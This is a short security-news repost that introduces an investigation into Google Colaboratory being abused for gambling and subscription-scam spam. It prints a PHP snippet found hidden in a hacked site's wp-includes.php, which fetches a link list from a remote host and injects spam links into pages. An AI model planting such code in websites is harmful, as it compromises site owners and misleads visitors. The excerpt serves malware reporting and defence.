Massive Google Colaboratory Abuse: Gambling and Subscription Scam

This investigation started with a small and quite simple piece of PHP malware found on a hacked website. We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file:

<?php

$lines = file(‘https://4ip[.]su/db/links.txt’);

shuffle($lines);

$data = array_rand($lines, 900);

echo ‘<p>’;

foreach($data as $value) {

$rand = substr(md5(microtime()),rand(0,26),6);

echo ‘<a href=”‘.$lines[$value].'”>’.$rand.'</a> ‘;

};

echo ‘</p>’;

This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into a web page.

Continue reading Massive Google Colaboratory Abuse: Gambling and Subscription Scam at .

Story added 18. July 2023, content source with full text you can find at link above.

Massive Google Colaboratory Abuse: Gambling and Subscription Scam

More antivirus and malware news?

Ads

Security news

Malware

Security

IT security

About site

Search Terms Tips

Recent New Tips

Recent Posts